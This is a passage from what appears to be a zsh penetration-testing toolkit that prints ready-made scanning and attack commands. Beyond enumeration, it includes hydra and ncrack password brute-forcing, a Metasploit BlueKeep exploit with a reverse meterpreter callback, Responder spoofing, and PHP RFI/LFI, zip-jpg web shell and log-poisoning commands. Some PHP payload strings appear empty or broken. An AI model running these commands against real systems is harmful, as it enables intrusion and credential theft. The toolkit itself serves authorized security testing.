$(__netpath)/nmap-discovery\"\n}\n\nqq-enum-network-masscan-top() {\n __check-project\n qq-vars-set-network\n print -z \"sudo masscan ${__NETWORK} -p${__TCP_PORTS} -oL $(__netpath)/masscan-top.txt\"\n}\n\nqq-enum-network-masscan-windows() {\n __check-project\n qq-vars-set-network\n print -z \"sudo masscan ${__NETWORK} -p135-139,445,3389,389,636,88 -oL $(__netpath)/masscan-windows.txt\"\n}\n\nqq-enum-network-masscan-linux() {\n __check-project\n qq-vars-set-network\n print -z \"sudo masscan ${__NETWORK} -p22,111,2222 -oL $(__netpath)/masscan-linux.txt\"\n}\n\nqq-enum-network-masscan-web() {\n __check-project\n qq-vars-set-network\n print -z \"sudo masscan ${__NETWORK} -p80,800,8000,8080,8888,443,4433,4443 -oL $(__netpath)/masscan-web.txt\"\n}\n" }, { "path": "modules/qq-enum-nfs.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-nfs\n#############################################################\n\nqq-enum-nfs-help() {\n cat << \"DOC\"\n\nqq-enum-nfs\n-----------\nThe qq-enum-nfs namespace contains commands for scanning and \nenumerating NFS services.\n\nCommands\n--------\nqq-enum-nfs-install: installs dependencies\nqq-enum-nfs-nmap-sweep: scan a network for services\nqq-enum-nfs-tcpdump: capture traffic to and from a host\nqq-enum-nfs-show: show remote NFS shares\nqq-enum-nfs-mount: mount a remote NFS share locally\n\nDOC\n}\n\nqq-enum-nfs-install() {\n __info \"Running $0...\"\n __pkgs tcpdump nmap nfs-common\n}\n\nqq-enum-nfs-nmap-sweep() {\n __check-project\n qq-vars-set-network\n print -z \"sudo nmap -n -Pn -sS -sU -p U:111,T:111,U:2049,T:2049 ${__NETWORK} -oA $(__netpath)/nfs-sweep\"\n}\n\nqq-enum-nfs-tcpdump() {\n __check-project\n qq-vars-set-iface\n qq-vars-set-rhost\n print -z \"sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 111 and port 2049 -w $(__hostpath)/nfs.pcap\"\n}\n\nqq-enum-nfs-show() {\n qq-vars-set-rhost\n print -z \"showmount -e ${__RHOST}\"\n}\n\nqq-enum-nfs-mount() {\n qq-vars-set-rhost\n local share && __askvar share SHARE\n mkdir -p /mnt/${share}\n print -z \"mount -t nfs ${__RHOST}:/${share} /mnt/${share} -o nolock\"\n}\n" }, { "path": "modules/qq-enum-oracle.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-oracle\n#############################################################\n\nqq-enum-oracle-help() {\n cat << \"DOC\"\n\nqq-enum-oracle\n--------------s\nThe qq-enum-oracle namespace contains commands for scanning and \nenumerating Oracle services and databases.\n\nCommands\n--------\nqq-enum-oracle-install: installs dependencies\nqq-enum-oracle-nmap-sweep: scan a network for services\nqq-enum-oracle-tcpdump: capture traffic to and from a host\nqq-enum-oracle-sqlplus: sqlplus client\nqq-enum-oracle-odat: odat anonymous enumeration\nqq-enum-oracle-odat-creds: odat authenticated enumeration\nqq-enum-oracle-odat-passwords: odat password brute\nqq-enum-oracle-version: tnscmd version query\nqq-enum-oracle-status: tnscmd status query\nqq-enum-oracle-sidguess: tnscmd password brute force\nqq-enum-oracle-oscanner: oscanner enumeration\nqq-enum-oracle-hydra-listener: brute force passwords \nqq-enum-oracle-hydra-sid: brute force passwords\n\nDOC\n}\n\nqq-enum-oracle-install() {\n __info \"Running $0...\"\n __pkgs tcpdump nmap odat tnscmd10g sidguess oscanner hydra\n __pkgs oracle-instantclient-sqlplus \n sudo sh -c \"echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf\"; sudo ldconfig\n}\n\nqq-enum-oracle-nmap-sweep() {\n __check-project\n qq-vars-set-network\n print -z \"sudo nmap -n -Pn -sS -p 1521 ${__NETWORK} -oA $(__netpath)/oracle-sweep\"\n}\n\nqq-enum-oracle-tcpdump() {\n __check-project\n qq-vars-set-iface\n qq-vars-set-rhost\n print -z \"sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 1521 -w $(__hostpath)/oracle.pcap\"\n}\n\nqq-enum-oracle-sqlplus() {\n qq-vars-set-rhost\n local sid && __askvar sid \"SID(DATABASE)\"\n local u && __askvar u \"USER\"\n local p && __askvar [u] \"PASSWORD\"\n print -z \"sqlplus ${u}/${p}@${__RHOST}:1521/${sid} as sysdba\"\n}\n\nqq-enum-oracle-odat() {\n qq-vars-set-rhost\n print -z \"odat all -s ${__RHOST}\"\n}\n\nqq-enum-oracle-odat-creds() {\n qq-vars-set-rhost\n local sid && __askvar sid \"SID(DATABASE)\"\n local u && __askvar u \"USER\"\n local p && __askvar [u] \"PASSWORD\"\n print -z \"odat all -s ${__RHOST} -p 1521 -d ${sid} -U ${u} -P ${p}\"\n}\n\nqq-enum-oracle-odat-passwords() {\n qq-vars-set-rhost\n local sid && __askvar sid \"SID(DATABASE)\"\n __info \"cat /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt | sed -e \"s/[[:space:]]/\\\\\\/g\"\"\n print -z \"odat passwordguesser -s ${__RHOST} -d ${sid} --accounts-file accounts.txt\"\n}\n\nqq-enum-oracle-version(){\n qq-vars-set-rhost\n print -z \"tnscmd10g version -h ${__RHOST}\"\n}\n\nqq-enum-oracle-status(){\n qq-vars-set-rhost\n print -z \"tnscmd10g status -h ${__RHOST}\"\n}\n\nqq-enum-oracle-sidguess(){\n qq-vars-set-rhost\n print -z \"sidguess host=${__RHOST} port=1521 sidfile=sid.txt\"\n}\n\nqq-enum-oracle-oscanner() {\n qq-vars-set-rhost\n print -z \"oscanner -s ${__RHOST}\"\n}\n\nqq-enum-oracle-hydra-listener() {\n __check-project\n qq-vars-set-rhost\n __check-user\n print -z \"hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/oracle-listener-hydra-brute.txt ${__RHOST} Oracle Listener\"\n}\n\nqq-enum-oracle-hydra-sid() {\n __check-project\n qq-vars-set-rhost\n __check-user\n print -z \"hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/oracle-sid-hydra-brute.txt ${__RHOST} Oracle Sid\"\n}\n" }, { "path": "modules/qq-enum-pop3.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-pop3\n#############################################################\n\nqq-enum-pop3-help() {\n cat << \"DOC\"\n\nqq-enum-pop3\n------------\nThe qq-enum-pop3 namespace contains commands for scanning \nand enumerating POP3 email services.\n\nCommands\n--------\nqq-enum-pop3-install: installs dependencies\nqq-enum-pop3-nmap-sweep: scan a network for services\nqq-enum-pop3-tcpdump: capture traffic to and from a host\nqq-enum-pop3-hydra: brute force passwords for a user account\n\nDOC\n}\n\nqq-enum-pop3-install() {\n __info \"Running $0...\"\n __pkgs nmap tcpdump hydra\n}\n\nqq-enum-pop3-nmap-sweep() {\n __check-project\n qq-vars-set-network\n print -z \"sudo nmap -n -Pn -sS -p 110,995 ${__NETWORK} -oA $(__netpath)/pop3-sweep\"\n}\n\nqq-enum-pop3-tcpdump() {\n __check-project\n qq-vars-set-iface\n qq-vars-set-rhost\n print -z \"sudo tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 110 and port 995 -w $(__hostpath)/pop3.pcap\"\n}\n\nqq-enum-pop3-hydra() {\n __check-project\n qq-vars-set-rhost\n __check-user\n print -z \"hydra -l ${__USER} -P ${__PASSLIST} -e -o $(__hostpath)/pop3-hydra-brute.txt ${__RHOST} POP3\"\n}\n" }, { "path": "modules/qq-enum-rdp.zsh", "content": "#!/usr/bin/env zsh\n\n#############################################################\n# qq-enum-rdp\n#############################################################\n\nqq-enum-rdp-help() {\n cat << \"DOC\"\n\nqq-enum-rdp\n------------\nThe qq-enum-rdp namespace contains commands for scanning\nand enumerating RDP remote desktop services.\n\nCommands\n--------\nqq-enum-rdp-install: installs dependencies\nqq-enum-rdp-nmap-sweep: scan a network for services\nqq-enum-rdp-tcpdump: capture traffic to and from a host\nqq-enum-rdp-ncrack: brute force passwords for a user account\nqq-enum-rdp-bluekeep: bluekeep exploit reference\nqq-enum-rdp-msf-bluekeep-scan: bluekeep metasploit scanner\nqq-enum-rdp-msf-bluekeep-exploit: bluekeep metasploit exploit\n\nDOC\n}\n\nqq-enum-rdp-install() {\n __info \"Running $0...\"\n __pkgs nmap tcpdump ncrack metasploit-framework\n}\n\nqq-enum-rdp-nmap-sweep() {\n __check-project\n qq-vars-set-network\n print -z \"nmap -n -Pn -sS -p3389 ${__NETWORK} -oA $(__netpath)/rdp-sweep\"\n}\n\nqq-enum-rdp-tcpdump() {\n __check-project\n qq-vars-set-iface\n qq-vars-set-rhost\n print -z \"tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 3389 -w $(__hostpath)/rdp.pcap\"\n}\n\nqq-enum-rdp-ncrack() {\n __check-project\n qq-vars-set-rhost\n __check-user\n print -z \"ncrack -vv --user ${__USER} -P ${__PASSLIST} rdp://${__RHOST} -oN $(__hostpath)/ncrack-rdp.txt \"\n}\n\nqq-enum-rdp-bluekeep() {\n __info \"https://sploitus.com/exploit?id=EDB-ID:47683\"\n print -z \"searchsploit bluekeep\"\n}\n\nqq-enum-rdp-msf-bluekeep-scan() {\n __check-project\n qq-vars-set-rhost\n local cmd=\"use auxiliary/scanner/rdp/cve_2019_0708_bluekeep; set RHOSTS ${__RHOST}; run; exit\"\n print -z \"msfconsole -n -q -x \\\" ${cmd} \\\" | tee $(__hostpath/bluekeep-scan.txt)\"\n}\n\nqq-enum-rdp-msf-bluekeep-exploit() {\n qq-vars-set-rhost\n qq-vars-set-lhost\n qq-vars-set-lport\n #__warn \"Start a handler using on ${__LHOST}:${__LPORT} before proceeding\"\n __msf << VAR\nuse windows/rdp/cve_2019_0708_bluekeep_rce;\nset RHOSTS ${__RHOST};\nset PAYLOAD windows/x64/meterpreter/reverse_https;\nset stagerverifysslcert true;\nset HANDLERSSLCERT ${__SHELL_SSL_CERT};\nset LHOST ${__LHOST};\nset LPORT ${__LPORT};\nrun;\nexit\nVAR\n\n}\n" }, { "path": "modules/qq-enum-smb.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-smb\n#############################################################\n\nqq-enum-smb-help() {\n cat << \"DOC\"\n\nqq-enum-smb\n------------\nThe qq-enum-smb namespace contains commands for scanning\nand enumerating smb services.\n\nCommands\n--------\nqq-enum-smb-install: installs dependencies\nqq-enum-smb-nmap-sweep: scan a network for services\nqq-enum-smb-tcpdump: capture traffic to and from a host\nqq-enum-smb-null-smbmap: query with smbmap null session\nqq-enum-smb-user-smbmap: query with smbmap authenticated session\nqq-enum-smb-null-enum4: enumerate with enum4linux\nqq-enum-smb-null-smbclient-list: list shares with a null session\nqq-enum-smb-null-smbclient-connect: connect with a null session\nqq-enum-smb-user-smbclient-connect: connect with an authenticated session\nqq-enum-user-smb-mount: mount an SMB share\nqq-enum-smb-samrdump: dump info using impacket\nqq-enum-smb-responder: spoof and get responses using responder\nqq-enum-smb-net-use-null: print a net use statement for windows\nqq-enum-smb-nbtscan: scan a local network \nqq-enum-smb-rpcclient: use rcpclient for queries\n\nDOC\n}\n\nqq-enum-smb-install() {\n __info \"Running $0...\"\n __pkgs nmap tcpdump smbmap enum4linux smbclient impacket-scripts responder nbtscan rpcclient\n}\n\nqq-enum-smb-nmap-sweep() {\n __check-project\n qq-vars-set-network\n print -z \"nmap -n -Pn -sS -sU -p445,137-139 ${__NETWORK} -oA $(__netpath)/smb-sweep\"\n}\n\nqq-enum-smb-tcpdump() {\n __check-project\n qq-vars-set-iface\n qq-vars-set-rhost\n print -z \"tcpdump -i ${__IFACE} host ${__RHOST} and tcp port 445 -w $(__hostpath)/smb.pcap\"\n}\n\nqq-enum-smb-null-smbmap() {\n qq-vars-set-rhost\n print -z \"smbmap -H ${__RHOST}\"\n}\n\nqq-enum-smb-user-smbmap() {\n qq-vars-set-rhost\n __check-user\n __info \"Usage with creds: -u -p -d \"\n print -z \"smbmap -u ${__USER} -H ${__RHOST}\"\n}\n\nqq-enum-smb-null-enum4() {\n qq-vars-set-rhost\n print -z \"enum4linux -a ${__RHOST} | tee $(__hostpath)/enum4linux.txt \"\n}\n\nqq-enum-smb-null-smbclient-list() {\n qq-vars-set-rhost\n print -r -z \"smbclient -L \\\\\\\\\\\\\\\\${__RHOST} -N \"\n}\n\nqq-enum-smb-null-smbclient-connect() {\n qq-vars-set-rhost\n __check-share\n print -r -z \"smbclient \\\\\\\\\\\\\\\\${__RHOST}\\\\\\\\${__SHARE} -N \"\n}\n\nqq-enum-smb-user-smbclient-connect() {\n qq-vars-set-rhost\n __check-user\n __check-share\n print -r -z \"smbclient \\\\\\\\\\\\\\\\${__RHOST}\\\\\\\\${__SHARE} -U ${__USER} \"\n}\n\nqq-enum-user-smb-mount() {\n qq-vars-set-rhost\n __check-user\n local p && __askvar p PASSWORD\n __check-share\n print -z \"mount //${__RHOST}/${__SHARE} /mnt/${__SHARE} -o username=${__USER},password=${p}\"\n}\n\nqq-enum-smb-samrdump() {\n qq-vars-set-rhost\n print -z \"python3 ${__IMPACKET}/samrdump.py ${__RHOST}\"\n}\n\nqq-enum-smb-responder() {\n qq-vars-set-iface\n print -z \"responder -I ${__IFACE} -A\"\n}\n\nqq-enum-smb-net-use-null() {\n qq-vars-set-rhost\n __info \"net use \\\\\\\\\\\\\\\\${__RHOST}\\\\IPC$ \\\"\\\" /u:\\\"\\\" \"\n}\n\nqq-enum-smb-nbtscan() {\n qq-vars-set-network\n print -z \"nbtscan ${__NETWORK}\"\n}\n\nqq-enum-smb-rpcclient() {\n qq-vars-set-rhost\n print -z \"rpcclient -U \\\" \\\" ${__RHOST}\"\n}" }, { "path": "modules/qq-enum-web-aws.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-web-aws\n#############################################################\n\nqq-enum-web-aws-help() {\n cat << \"DOC\"\n\nqq-enum-web-aws\n---------------\nThe qq-enum-web-aws namespace contains commands for scanning \nand enumerating AWS hosted services.\n\nCommands\n--------\nqq-enum-web-aws-install: installs dependencies\nqq-enum-web-aws-s3-ls: use the awscli to list files in an S3 bucket\nqq-enum-web-aws-s3-write: use the awscli to copy a local file to an S3 bucket\nqq-enum-web-aws-s3-scanner: scan a list of buckets\n\nDOC\n}\n\nqq-enum-web-aws-install() {\n __info \"Running $0...\"\n __pkgs awscli\n qq-install-s3scanner\n}\n\nqq-enum-web-aws-s3-ls() {\n qq-vars-set-rhost\n print -z \"aws s3 ls s3://${__RHOST} --recursive\"\n}\n\nqq-enum-web-aws-s3-write() {\n qq-vars-set-rhost\n __ask \"Select a file to copy to the S3 bucket\"\n local f && __askpath f FILE $(pwd)\n print -z \"aws s3 cp \\\"${f}\\\" s3://${__RHOST}\"\n}\n\nqq-enum-web-aws-s3-scanner() {\n __ask \"Select a file that contains a list of S3 buckets\"\n local f && __askpath f FILE $(pwd)\n __info \"Use -d to dump buckets to local path\"\n print -z \"python3 ${__TOOLS}/S3Scanner/s3scanner.py ${f}\"\n} \n" }, { "path": "modules/qq-enum-web-dirs.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-web-dirs\n#############################################################\n\nqq-enum-web-dirs-help() {\n cat << \"DOC\"\n\nqq-enum-web-dirs\n----------------\nThe qq-enum-web-dirs namespace contains commands for discovering web content, directories and files.\n\nCommands\n--------\nqq-enum-web-dirs-install: installs dependencies\nqq-enum-web-dirs-robots: get robots.txt using curl\nqq-enum-web-dirs-parsero: parse complex robots.txt with parsero\nqq-enum-web-dirs-wfuzz: brute force dirs and files with wfuzz\nqq-enum-web-dirs-ffuf: brute force dirs and files with ffuf\nqq-enum-web-dirs-gobuster: brute force dirs and files with gobuster\n\nDOC\n}\n\nqq-enum-web-dirs-install() {\n __info \"Running $0...\"\n __pkgs parsero gobuster wfuzz curl seclists wordlists \n qq-install-golang\n go get -u github.com/ffuf/ffuf\n go get -v -u github.com/tomnomnom/httprobe\n}\n\nqq-enum-web-dirs-robots() {\n __check-project\n qq-vars-set-url\n print -z \"curl -s -L --user-agent \\\"${__UA}\\\" \\\"${__URL}/robots.txt\\\" | tee $(__urlpath)/robots.txt\"\n}\n\nqq-enum-web-dirs-parsero() {\n __check-project\n qq-vars-set-url\n print -z \"parsero -u \\\"${__URL}\\\" -o -sb | tee $(__urlpath)/robots.txt\"\n}\n\nqq-enum-web-dirs-wfuzz() {\n __check-project\n qq-vars-set-url\n qq-vars-set-wordlist\n local d && __askvar d \"RECURSION DEPTH\"\n print -z \"wfuzz -s 0.1 -R${d} --hc=404 -w ${__WORDLIST} ${__URL}/FUZZ --oF $(__urlpath)/wfuzz-dirs.txt\"\n}\n\nqq-enum-web-dirs-ffuf() {\n __check-project\n qq-vars-set-url\n qq-vars-set-wordlist\n __check-threads\n local d && __askvar d \"RECURSION DEPTH\"\n print -z \"ffuf -p 0.1 -t ${__THREADS} -recursion -recursion-depth ${d} -H \\\"User-Agent: Mozilla\\\" -fc 404 -w ${__WORDLIST} -u ${__URL}/FUZZ -o $(__urlpath)/ffuf-dirs.csv -of csv\"\n}\n\nqq-enum-web-dirs-gobuster() {\n __check-project\n qq-vars-set-url\n qq-vars-set-wordlist\n __check-threads\n print -z \"gobuster dir -u ${__URL} -a \\\"${__UA}\\\" -t1 -k -w ${__WORDLIST} | tee $(__urlpath)/gobuster-dirs.txt \"\n}\n" }, { "path": "modules/qq-enum-web-eslastic.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-web-elastic\n#############################################################\n\nqq-enum-web-elastic-help() {\n cat << \"DOC\"\n\nqq-enum-web-elastic\n-------------------\nThe qq-enum-web-elastic namespace contains commands for scanning and enumerating\nelastic search services.\n\nCommands\n--------\nqq-enum-web-elastic-install: installs dependencies\nqq-enum-web-elastic-nmap: scan the target using the elasticsearch nmap nse script\nqq-enum-web-elastic-health: query the target using curl for cluster health\nqq-enum-web-elastic-indices: query the target using curl for indices\nqq-enum-web-elastic-search: query an index using curl\nqq-enum-web-elastic-all: query for 1000 records in an index using curl\n\nDOC\n}\n\nqq-enum-web-elastic-install() {\n __info \"Running $0...\"\n __pkgs nmap curl\n qq-install-nmap-elasticsearch-nse\n}\n\nqq-enum-web-elastic-nmap() {\n __check-project\n qq-vars-set-rhost\n print -z \"sudo nmap -n -Pn -p9200 --script=elasticsearch ${__RHOST} -oN $(__hostpath)/nmap-elastic.txt\"\n}\n\nqq-enum-web-elastic-health() {\n qq-vars-set-url\n print -z \"curl -A \\\"${__UA}\\\" -XGET \\\"${__URL}:9200/_cluster/health?pretty\\\"\"\n}\n\nqq-enum-web-elastic-indices() {\n qq-vars-set-url\n print -z \"curl -A \\\"${__UA}\\\" -XGET \\\"${__URL}:9200/_cat/indices?v\\\"\"\n}\n\nqq-enum-web-elastic-search() {\n qq-vars-set-url\n local i && __askvar i \"INDEX\" \n __ask \"Enter a query, such as *:password\"\n local q && __askvar q \"QUERY\"\n print -z \"curl -A \\\"${__UA}\\\" -XGET \\\"${__URL}:9200/${i}/_search?q=${q}&size=10&pretty\\\"\"\n}\n\nqq-enum-web-elastic-all() {\n __check-project\n qq-vars-set-url\n local i && __askvar i \"INDEX\"\n print -z \"curl -A \\\"${__UA}\\\" -XGET \\\"${__URL}:9200/${i}/_search?size=1000\\\" | tee $(__urlpath)/elastic-docs.json\"\n}\n" }, { "path": "modules/qq-enum-web-fuzz.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-web-fuzz\n#############################################################\n\nqq-enum-web-fuzz-help() {\n cat << \"DOC\"\n\nqq-enum-web-fuzz\n--------------\nThe qq-enum-web-fuzz namespace contains commands for fuzzing\ninputs of web applications\n\nCommands\n--------\nqq-enum-web-fuzz-install: installs dependencies\nqq-enum-web-fuzz-auth-basic-payloads: generate base64 encoded credentials\nqq-enum-web-fuzz-auth-basic-ffuf: brute force basic auth\nqq-enum-web-fuzz-auth-json-ffuf: brute force basic auth with json post\nqq-enum-web-fuzz-auth-post-ffuf: brute force auth with post\nqq-enum-web-fuzz-auth-post-wfuzz: brute force auth with post\nqq-enum-web-brute-hydra-get: brute force auth with get\nqq-enum-web-brute-hydra-form-post: brute force auth with post\n\nDOC\n}\n\nqq-enum-web-fuzz-install() {\n __info \"Running $0...\"\n __pkgs seclists wordlists wfuzz hydra\n qq-install-golang\n go get -u github.com/ffuf/ffuf\n}\n\n\nqq-enum-web-fuzz-auth-basic-payloads() {\n qq-vars-set-wordlist\n __check-user\n print -z \"file=\\\"${f}\\\"; while IFS= read line; do; echo -n \\\"${__USER}:\\$line\\\" | base64 ; done <\\\"\\$file\\\" > payloads.b64\"\n}\n\n# ffuf\n\nqq-enum-web-fuzz-auth-basic-ffuf() {\n qq-vars-set-url\n __ask \"Select file containing authorization header payloads\"\n local f && __askpath f FILE $(pwd)\n __check-threads\n print -z \"ffuf -t ${__THREADS} -p \\\"0.1\\\" -w ${f} -H \\\"Authorization: Basic FUZZ\\\" -fc 401 -u ${__URL} \"\n}\n\nqq-enum-web-fuzz-auth-json-ffuf() {\n qq-vars-set-url\n __check-threads\n print -z \"ffuf -t ${__THREADS} -p \\\"0.1\\\" -w /usr/share/seclists/Fuzzing/Databases/NoSQL.txt -u ${__URL} -X POST -H \\\"Content-Type: application/json\\\" -d '{\\\"username\\\": \\\"FUZZ\\\", \\\"password\\\": \\\"FUZZ\\\"}' -fr \\\"error\\\" \"\n}\n\nqq-enum-web-fuzz-auth-post-ffuf() {\n qq-vars-set-url\n local uf && __askvar uf USER_FIELD\n local uv && __askvar uv USER_VALUE\n local pf && __askvar pf PASSWORD_FIELD\n __check-threads\n print -z \"ffuf -t ${__THREADS} -p \\\"0.1\\\" -w ${__PASSLIST} -H \\\"Content-Type: application/x-www-form-urlencoded\\\" -X POST -d \\\"${uf}=${uv}&${pf}=FUZZ\\\" -u ${__URL} -fs 75 \"\n}\n\n# wfuzz\n\nqq-enum-web-fuzz-auth-post-wfuzz() {\n qq-vars-set-url\n local uf && __askvar uf USER_FIELD\n local uv && __askvar uv USER_VALUE\n local pf && __askvar pf PASSWORD_FIELD\n print -z \"wfuzz -c -w ${__PASSLIST} -d \\\"${uf}=${uv}&${pf}=FUZZ\\\" --sc 302 ${__URL}\"\n}\n\nqq-enum-web-brute-hydra-get() {\n qq-vars-set-rhost\n __check-user\n __ask \"Enter the URI for the get request, ex: /path\"\n local uri && __askvar uri URI\n print -z \"hydra -l ${__USER} -P ${__PASSLIST} ${__RHOST} http-get ${uri}\"\n}\n\nqq-enum-web-brute-hydra-form-post() {\n qq-vars-set-rhost\n __ask \"Enter the URI for the post request, ex: /path\"\n local uri && __askvar uri URI\n local uf && __askvar uf USER_FIELD\n local uv && __askvar uv USER_VALUE\n local pf && __askvar pf PASSWORD_FIELD\n __ask \"Enter the response value to check for failure\"\n local fm && __askvar fm FAILURE\n print -z \"hydra ${__RHOST} http-form-post \\\"${uri}:${uf}=^USER^&${pf}=^PASS^:${fm}\\\" -l ${uv} -P ${__PASSLIST} -t 10 -w 30 \"\n}" }, { "path": "modules/qq-enum-web-js.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-web-js\n#############################################################\n\nqq-enum-web-js-help() {\n cat << \"DOC\"\n\nqq-enum-web-js\n--------------\nThe qq-enum-web-js namespace contains commands for enumerating\njavascript files and mining for urls and secrets.\n\nCommands\n--------\nqq-enum-web-js-install: installs dependencies\nqq-enum-web-js-beautify: beautify JS file\nqq-enum-web-js-link-finder-url: run linkfinder on a file\nqq-enum-web-js-link-finder-domain: run linkfinder on all files of a site\nqq-enum-web-js-curl: enumerate links using curl\n\nDOC\n}\n\nqq-enum-web-js-install() {\n __info \"Running $0...\"\n __pkgs jsbeautifier qq-install-link-finder\n qq-install-node\n npm i -g eslint\n}\n\nqq-enum-web-js-beautify() {\n local f && __askpath f FILE $(pwd)\n print -z \"js-beautify ${f} > source-$(basename ${f})\"\n}\n\nqq-enum-web-js-link-finder-url() {\n __check-project\n __ask \"Set the URL of a javascript file\"\n qq-vars-set-url\n print -z \"python3 linkfinder.py -i ${__URL} -o $(__urlpath)/js-links.html\"\n}\n\nqq-enum-web-js-link-finder-domain() {\n __check-project\n qq-vars-set-url\n print -z \"python3 linkfinder.py -i ${__URL} -d -o $(__urlpath)/js-links-all.html\"\n}\n\nqq-enum-web-js-curl() {\n qq-vars-set-url\n curl -Lks ${__URL} | tac | sed \"s#\\\\\\/#\\/#g\" | egrep -o \"src['\\\"]?\\s*[=:]\\s*['\\\"]?[^'\\\"]+.js[^'\\\"> ]*\" | sed -r \"s/^src['\\\"]?[=:]['\\\"]//g\" | awk -v url=${__URL} '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\\/\\//) print \"https:\"$1; else print url\"/\"$1}' | sort -fu | xargs -I '%' sh -c \"echo \\\"'##### %\\\";curl -k -s \\\"%\\\" | sed \\\"s/[;}\\)>]/\\n/g\\\" | grep -Po \\\"('#####.*)|(['\\\\\\\"](https?:)?[/]{1,2}[^'\\\\\\\"> ]{5,})|(\\.(get|post|ajax|load)\\s*\\(\\s*['\\\\\\\"](https?:)?[/]{1,2}[^'\\\\\\\"> ]{5,})\\\" | sort -fu\" | tr -d \"'\\\"\"\n}\n\n\n" }, { "path": "modules/qq-enum-web-php.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-web-php\n#############################################################\n\nqq-enum-web-php-help() {\n cat << \"DOC\"\n\nqq-enum-web-php\n----------------\nThe qq-enum-web-php namespace contains commands for discovering web content, directories and files\non PHP web servers\n\nCommands\n--------\nqq-enum-web-php-install: installs dependencies\nqq-enum-web-php-ffuf: scan for PHP files\nqq-enum-web-php-rfi: exploit typical RFI params\nqq-enum-web-php-rfi-input \nqq-enum-web-php-lfi-proc-self-environ\nqq-enum-web-php-lfi-filter-resource\nqq-enum-web-php-lfi-zip-jpg-shell\nqq-enum-web-php-lfi-logfile\nqq-enum-web-php-gen-htaccess: generate an htaccess file\nqq-enum-web-php-phpinfo: generate phpinfo payload\n\nDOC\n}\n\nqq-enum-web-php-install() {\n __info \"Running $0...\"\n __pkgs curl seclists wordlists\n qq-install-golang\n go get -u github.com/ffuf/ffuf\n go get -v -u github.com/tomnomnom/httprobe\n}\n\nqq-enum-web-php-ffuf() {\n __check-project\n qq-vars-set-url\n qq-vars-set-wordlist\n __check-threads\n local d && __askvar d \"RECURSION DEPTH\"\n print -z \"ffuf -p 0.1 -t ${__THREADS} -recursion -recursion-depth ${d} -H \\\"User-Agent: Mozilla\\\" -fc 404 -w ${__WORDLIST} -u ${__URL}/FUZZ -e ${__EXT_PHP} -o $(__urlpath)/ffuf-dirs-php.csv -of csv\"\n}\n\nqq-enum-web-php-rfi() {\n __ask \"URL should contain a URI like /page.php?rfi=\"\n qq-vars-set-url\n __ask \"PAYLOAD URL should contain reverse php shell\"\n local p && __askvar p PAYLOAD_URL\n print -z \"curl -k -v -XGET \\\"${__URL}${p}%00\\\" \"\n}\n\nqq-enum-web-php-rfi-input() {\n __ask \"URL should contain a URI like /page.php?rfi=\"\n qq-vars-set-url\n print -z \"curl -k -v -XPOST --data \\\"\\\" \\\"${__URL}php://input%00\\\" \"\n}\n\nqq-enum-web-php-lfi-proc-self-environ() {\n __ask \"URL should contain a URI like /page.php?lfi=\"\n qq-vars-set-url\n print -z \"curl -k -v -A \\\"\\\" \\\"${__URL}../../../proc/self/environ\\\" \"\n}\n\nqq-enum-web-php-lfi-filter-resource(){\n __ask \"URL should contain a URI like /page.php?lfi=\"\n qq-vars-set-url\n __ask \"Set path to a remote file\"\n local f && __askvar f REMOTE_FILE\n print -z \"curl -k -v -XGET \\\"${__URL}php://filter/convert.base64-encode/resource=${f}\\\" \"\n}\n\nqq-enum-web-php-lfi-zip-jpg-shell() {\n __ask \"URL should contain a URI like /page.php?lfi=\"\n qq-vars-set-url\n\n echo \"
\" > payload.php\n zip payload.zip payload.php\n mv payload.zip shell.jpg\n\n __info \"Created shell.jpg\"\n __warn \"First upload shell.jpg to target\"\n\n print -z \"curl -k -v -XGET \\\"${__URL}zip://shell.jpg%23payload.php?cmd=\\\" \"\n}\n\nqq-enum-web-php-lfi-logfile() {\n __ask \"URL should contain a URI like /page.php?lfi=\"\n qq-vars-set-url\n local b && __askvar b \"TARGET URL\"\n curl -s \"${b}/\"\n __info \"lfi request completed\"\n print -z \"curl -k -v \\\"${__URL}../../../../../var/log/apache2/access.log&cmd=whoami\\\" \"\n}\n\nqq-enum-web-php-gen-htaccess() {\n local e && __askvar e Extension\n __ask \"Upload .htaccess file to make alt extension executable by PHP\"\n print -z \"echo \\\"AddType application/x-httpd-php ${e}\\\" > htaccess\"\n}\n\nqq-enum-web-php-phpinfo() {\n print -z \"echo \\\"

PHP INFO PAGE


\\\" > phpinfo.php\"\n}" }, { "path": "modules/qq-enum-web-ssl.zsh", "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-enum-web-ssl\n#############################################################\n\nqq-enum-web-ssl-help() {\n cat << \"DOC\"\n\nqq-enum-web-ssl\n----------------\nThe enum-web-ssl namespace contains commands for enumerating SSL/TLS.\n\nCommands\n--------\nqq-enum-web-ssl-install: installs dependencies\nqq-enum-web-ssl-tcpdump: capture traffic to and from target\nqq-enum-web-ssl-der-to-crt: convert a .der file to .crt\nqq-enum-web-ssl-crt-ca-install: install a root certificate (.crt)\nqq-enum-web-ssl-certs: display cert from a url\nqq-enum-web-ssl-cert-download: download certs from a url\nqq-enum-web-ssl-testssl-full:\nqq-enum-web-ssl-testssl-ciphers:\n\nDOC\n}\n\nqq-enum-web-ssl-install() {\n __info \"Running $0...\"\n __pkgs curl nmap tcpdump openssl testssl\n}\n\nqq-enum-web-ssl-tcpdump() {\n __check-project\n qq-vars-set-iface\n qq-vars-set-rhost\n print 